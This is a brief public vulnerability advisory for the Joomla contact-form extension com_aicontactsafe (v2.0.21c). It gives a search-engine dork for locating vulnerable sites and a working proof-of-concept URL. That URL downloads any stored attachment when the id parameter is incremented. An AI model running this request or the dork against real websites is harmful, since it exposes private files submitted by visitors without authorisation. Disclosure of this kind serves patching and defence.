Joomla com_aicontactsafe Arbitrary Attachment Download - 08.06.2017

Everyone can download arbitrary attachment, but website must have including field with attachments.


# Vulnerability: Joomla com_aicontactsafe Arbitrary Attachment Download
# Date: 08.06.2017
# Software link: http://www.algisinfo.com/en/download/category/1-free-extensions.html
# Dork: inurl:index.php?option=com_aicontactsafe
# Version: v.2.0.21c.stable
# Exploit Author: Dave
# Website: http://www.morawskiweb.pl
# Contact: dawidmorawski1990@gmail.com
#######################################

1. Description:
Everyone can download arbitrary attachment, but website must have including field with attachments.

2. Proof of Concept:
localhost/index.php?option=com_aicontactsafe&sTask=message&task=download&id=1&format=raw

All you have to do is change “id” value.

Written on June 8, 2017